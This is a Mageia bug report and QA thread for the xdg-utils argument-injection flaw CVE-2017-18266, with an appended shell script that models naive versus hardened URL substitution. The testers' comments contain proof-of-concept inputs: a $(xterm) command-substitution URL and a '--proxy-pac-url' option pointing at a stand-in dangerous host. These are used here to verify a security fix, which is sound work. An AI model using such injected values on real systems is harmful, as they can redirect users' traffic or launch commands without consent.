| Summary: | xdg-utils new security issue CVE-2017-18266 | ||
|---|---|---|---|
| Product: | Mageia | Reporter: | David Walser <luigiwalser> |
| Component: | Security | Assignee: | QA Team <qa-bugs> |
| Status: | RESOLVED FIXED | QA Contact: | Sec team <security> |
| Severity: | normal | ||
| Priority: | Normal | CC: | herman.viaene, jani.valimaa, shlomif, sysadmin-bugs, tarazed25 |
| Version: | 6 | Keywords: | advisory, has_procedure, validated_update |
| Target Milestone: | --- | ||
| Hardware: | All | ||
| OS: | Linux | ||
| Whiteboard: | MGA6-64-OK | ||
| Source RPM: | xdg-utils-1.1.2-1.1.mga6.src.rpm | CVE: | |
| Status comment: | |||
|
Description
David Walser
2018-06-07 20:44:02 CEST
David Walser
2018-06-07 20:44:20 CEST
CC:
(none) =>
jani.valimaa, shlomif

Note that they followed up with a regression fix on May 30:
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/7OOOVBRZM3RYFISCO5UONJIXTBMKONYF/

Pushed xdg-utils-1.1.3-1 to mga6 core/updates_testing.

Assignee:
bugsquad =>
qa-bugs

Advisory:
========================

Updated xdg-utils package fixes security vulnerability:

The open_envvar function in xdg-open in xdg-utils before 1.1.3 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL, as demonstrated by %s in this environment variable (CVE-2017-18266).

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18266
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ZECHRCR6RWTX46ANDPIAXPMHZ2EOHNJB/
========================

Updated packages in core/updates_testing:
========================
xdg-utils-1.1.3-1.mga6

from xdg-utils-1.1.3-1.mga6.src.rpm

MGA6-32 on IBM Thinkpad R50e MATE
No installation issues.
Ref to bug 14932 Comment 16
Giving this command at CLI
$ xdg-open 'http://127.0.0.1/$(xterm)'
results in a new tab in Firefox with "error 404", but
$ xdg-open 'http://127.0.0.1/$%(xterm)'
as in the same comment results in error 400.
I let people with more understanding judge this issue.

CC:
(none) =>
herman.viaene

CVE-2017-18266
https://bugs.freedesktop.org/show_bug.cgi?id=103807

$ BROWSER="firefox %s" xdg-open "http://www.example.com/ --incognito"
This shows a yellow page with a report of an XML error.
'http://www.example.com/%20--incognito' in the address bar.
Not possible to say whether this page is being opened at the given URL or locally.

$ BROWSER="firefox %s" xdg-open "http://www.example.com/ --proxy-pac-url=http://dangerous.example.com/proxy.pac"
Similar response.

Clean update.
The behaviour is the same for the first example above, so, in agreement with Herman I shall leave the interpretation to others.
The older PoC gave the same results as in comment 4.

Utilities available: man or --help for more information.
* xdg-desktop-icon Install icons to the desktop
* xdg-desktop-menu Install desktop menu items
* xdg-email Send mail using the user's preferred e-mail composer
* xdg-icon-resource Install icon resources
* xdg-mime Query information about file type handling and install descriptions for new file types
* xdg-open Open a file or URL in the user's preferred application
* xdg-screensaver Control the screensaver
* xdg-settings Get various settings from the desktop environment

$ xdg-email --cc tarazed25@gmail.com --subject "xdg-utils testing" --body "Can you hear me Muther
> I say, can you hear me Muther?" <...@....>.com
This popped up a mail composer window in thunderbird with the specified fields filled in, message ready to be sent.

Fiddled with the desktop and icon install stuff but got nowhere with those.

$ xdg-open http://exoplanet.eu
No problem with that.

$ xdg-settings get default-web-browser
userapp-Firefox-2P2D6X.desktop

Installed iceape but did no configuration.
$ BROWSER=/usr/bin/iceape xdg-open http://exoplanet.eu
The site came up OK in iceape but there were backend errors reported and entreaties to run mozplugger-update. Ignored those.
This package obviously requires more background knowledge for effective operation but on the face of it seems to be working. CC:
(none) =>
tarazed25
Len Lawrence
2018-06-15 19:39:48 CEST
Whiteboard:
(none) =>
MGA6-64-OK
David Walser
2018-06-17 18:28:57 CEST
Component:
RPM Packages =>
Security

Advisoried. Validating.

Keywords:
(none) =>
advisory, has_procedure, validated_update

An update for this issue has been pushed to the Mageia Updates repository.
https://advisories.mageia.org/MGASA-2018-0289.html

Resolution:
(none) =>
FIXED |
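
Added example (not xdg-open's code and not part of this bug report): a simplified shell model of the %s handling described in the advisory, showing how word-splitting after substitution turns a space in the URL into a separate argument, next to a variant that splits only the BROWSER template. The names `show_args`, `launch_naive` and `launch_safe` are hypothetical; the URL is the test string from the comments above.

```shell
#!/bin/sh
# Constructed stand-in for the browser: prints each argument it receives in brackets.
show_args() {
    for a in "$@"; do printf '[%s]' "$a"; done
    echo
}

# Naive model: substitute the URL into the template first, then let the shell
# word-split the combined string. Whitespace in the URL becomes an argument
# boundary, so "--incognito" reaches the program as its own option.
launch_naive() {
    template=$1
    url=$2
    # shellcheck disable=SC2046,SC2059
    set -- $(printf "$template" "$url")
    "$@"
}

# Hardened model: split only the BROWSER template into words, then replace
# %s inside each word. The URL is never re-split, so it stays one argument.
launch_safe() {
    template=$1
    url=$2
    set -f                      # no pathname expansion on template words
    set -- $template
    set +f
    n=$#
    while [ "$n" -gt 0 ]; do
        word=$1
        shift
        case $word in
            *%s*) word="${word%%\%s*}${url}${word#*%s}" ;;
        esac
        set -- "$@" "$word"
        n=$((n - 1))
    done
    "$@"
}

# Test string taken from the comments above.
URL='http://www.example.com/ --incognito'
launch_naive 'show_args %s' "$URL"   # two arguments
launch_safe  'show_args %s' "$URL"   # one argument
```

When checking an updated package, the same idea applies: point BROWSER at a harmless argument-printing script instead of a real browser to see exactly how many arguments the URL arrives as.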